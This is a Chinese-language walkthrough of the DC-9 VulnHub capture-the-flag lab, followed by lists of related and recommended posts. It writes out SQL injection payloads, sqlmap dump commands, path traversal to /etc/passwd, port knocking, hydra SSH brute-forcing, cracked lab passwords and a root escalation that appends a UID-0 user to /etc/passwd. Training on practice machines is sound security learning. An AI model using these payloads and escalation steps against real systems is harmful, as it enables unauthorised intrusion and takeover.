仅供个人娱乐

靶机信息

下载地址:http://www.five86.com/downloads/DC-9.zip

一、主机扫描

二、信息收集

三、漏洞查找和利用

发现search的地方可能有sql注入

1' union select 1,2,3,4,5,6#

-1' union select 1,2,3,4,5,database()--+

#

-1'union select 1,2,3,4,5,group_concat(table_name) from information_schema.tables where table_schema = database()#

-1'
union select 1,2,3,4,5,group_concat(column_name) from
information_schema.columns where table_schema=database() and
table_name='Users'#

-1' union select 1,2,3,4,5,group_concat(UserID,Username,Password)from Users#

使用sqlmap

sqlmap -r 1.txt --dbs

sqlmap -r 1.txt -D users --tables

sqlmap -r 1.txt -D users -T UserDetails --columns

sqlmap -r 1 .txt -D users -T UserDetails --dump

sqlmap -r 1.txt -D Staff--tables

sqlmap -r 1.txt -D Staff -T Users --columns

sqlmap -r 1.txt -D Staff -T Users -C Password,UserID,Username –-dump

transorbital1

http://192.168.17.136/manage.php?file=../../../../etc/passwd

没有爆破到

信息收集 发现ssh端口为filtered  百度

这个knockd.conf是一种端口试探服务器工具。它侦听以太网或其他可用接口上的所有流量,等待特殊序列的端口命中(port-hit)。telnet或Putty等客户软件通过向服务器上的端口发送TCP或数据包来启动端口命中,也可以直接用nc敲击端口。

http://192.168.17.136/manage.php?file=../../../../etc/knockd.conf

查看该文件,我们需要依次敲击 7469 8475 9842 端口实现敲门操作

nc 192.169.17.136 7469

nc 192.169.17.136 8475

nc 192.169.17.136 9842

或者

nmap -p 7469 192.168.17.136

nmap -p 8475 192.168.17.136

nmap -p 9842 192.168.17.136

nmap -p22 192.168.17.136

hydra -L 1.txt -P 2.txt ssh://192.168.17.136

得到密码

login: chandlerb password: UrAG0D!

login: janitor  password: Ilovepeepee

login: joeyt  password: Passw0rd

login: fredf  password: B4-Tru3-001

登录信息收集

使用find命令找到该文件,查看源代码

find / -name"test.py"2>/dev/null

cat /opt/devstuff/test.py

百度创个账户

openssl passwd -1 -salt au 123456

echo'au:$1$au$yiTIEVOOBr5S6eBjHZluV/:0:0:root:/bin/bash'>> /tmp/au
sudo ./test/tmp/au /etc/passwd

然后运行test脚本,切换到au用户,成功得到root权限

su au

123456



DC-9靶机的更多相关文章

  1. DC 1-3 靶机渗透

    DC-1靶机 端口加内网主机探测,发现192.168.114.146这台主机,并且开放了有22,80,111以及48683这几个端口. 发现是Drupal框架. 进行目录的扫描: 发现admin被禁止 ...

  2. Vulnhub DC-9靶机渗透

    信息搜集 nmap -sP 192.168.146.0/24 #主机发现 nmap -A 192.168.146.147 #扫描端口等信息 22端口过滤,80端口开放,同样的从80端口入手. 不是现成 ...

  3. vulnhub-DC:2靶机渗透记录

    准备工作 在vulnhub官网下载DC:1靶机https://www.vulnhub.com/entry/dc-2,311/ 导入到vmware 打开kali准备进行渗透(ip:192.168.200 ...

  4. vulnhub-DC:1靶机渗透记录

    准备工作 在vulnhub官网下载DC:1靶机https://www.vulnhub.com/entry/dc-1,292/ 导入到vmware 打开kali准备进行渗透(ip:192.168.200 ...

  5. vulnhub-DC:3靶机渗透记录

    准备工作 在vulnhub官网下载DC:1靶机www.vulnhub.com/entry/dc-3,312/ 导入到vmware 导入的时候遇到一个问题 解决方法: 点 "虚拟机" ...

  6. vulnhub-DC:4靶机渗透记录

    准备工作 在vulnhub官网下载DC:4靶机https://www.vulnhub.com/entry/dc-4,313/ 导入到vmware,设置成NAT模式 打开kali准备进行渗透(ip:19 ...

  7. vulnhub-DC:5靶机渗透记录

    准备工作 在vulnhub官网下载DC:5靶机DC: 5 ~ VulnHub 导入到vmware,设置成NAT模式 打开kali准备进行渗透(ip:192.168.200.6) 信息收集 利用nmap ...

  8. vulnhub-DC:6靶机渗透记录

    准备工作 在vulnhub官网下载DC:6靶机DC: 6 ~ VulnHub 导入到vmware,设置成NAT模式 打开kali准备进行渗透(ip:192.168.200.6) 信息收集 利用nmap ...

  9. vulnhub-DC:7靶机渗透记录

    准备工作 在vulnhub官网下载DC:7靶机DC: 7 ~ VulnHub 导入到vmware,设置成NAT模式 打开kali准备进行渗透(ip:192.168.200.6) 信息收集 已经知道了靶 ...

  10. DC-1 靶机渗透测试

    DC-1靶机渗透测试 对着镜子大喊三声"太菜了""太菜了""太菜了" DC系列靶机的第一篇.边学习边日靶机边进步,摸爬滚打着前行. 内容不只 ...

随机推荐

  1. No serializer found for class com.bean.user and no properties discovered to create BeanSerializer

    解决方法: 方法1:将bean目录下的实体类属性由private改为public(不推荐): 方法2:给实体类属性设置setter和getter方法(推荐使用).

  2. 29、Tomcat只允许指定域名访问,禁用IP地址访问,防止恶意解析

    1.1.测试环境说明: Linux版本:7.6 IP地址:10.11.220.123/24 Tomcat版本:tomcat-8.5.37(端口号为8080) Jdk版本:1.8.0_202 1.2.配 ...

  3. 3、mysql的多实例配置(3)

    8.mysql多实例故障排错:

  4. 9.10、mysql进程、状态在线修改参数重要知识

    1.-e :改参数表示不用登陆mysql就可以使用mysql的命令,有利于于加管道符对数据进行处理: mysql -uroot -p123456 -e "show databases;&qu ...

  5. 同步工具——Exchanger

    本博客系列是学习并发编程过程中的记录总结.由于文章比较多,写的时间也比较散,所以我整理了个目录贴(传送门),方便查阅. 并发编程系列博客传送门 本文是转载文章,原文请见这里 一.Exchanger简介 ...

  6. SQL Server数据库阻塞,死锁查询

    sql 查询卡顿数据库 SELECT SPID=p.spid, DBName = convert(CHAR(20),d.name), ProgramName = program_name, Login ...

  7. 明明是企业管理软件,CRM系统为何被抵触?

    小编在昨天的文章<CRM系统为什么没有达到预期效果?>中曾说过,CRM客户管理系统没有达到预期效果的其中一个原因是CRM系统的使用率太低,而根本的原因是员工的抵触.明明是企业管理大师,CR ...

  8. 导入项目发现没得右边没得maven

    使用ctrl + shift+A点Add Maven Project 就行了 参考:https://www.cnblogs.com/Juff-code/p/13390356.html

  9. swing设置观感

    1.先获取当前系统支持的观感样式 1 UIManager.LookAndFellInfo[] infos = UIManager.getInstalledLookAndFeels(); 2 3 Str ...

  10. centos 安装jre

    r第一步:将安装的jre安装文件上传到Linux系统中(这里用的是finalshell工具) 第二步:  解压tar -zxvf server-jre-8u131-linux-x64.tar.gz 显 ...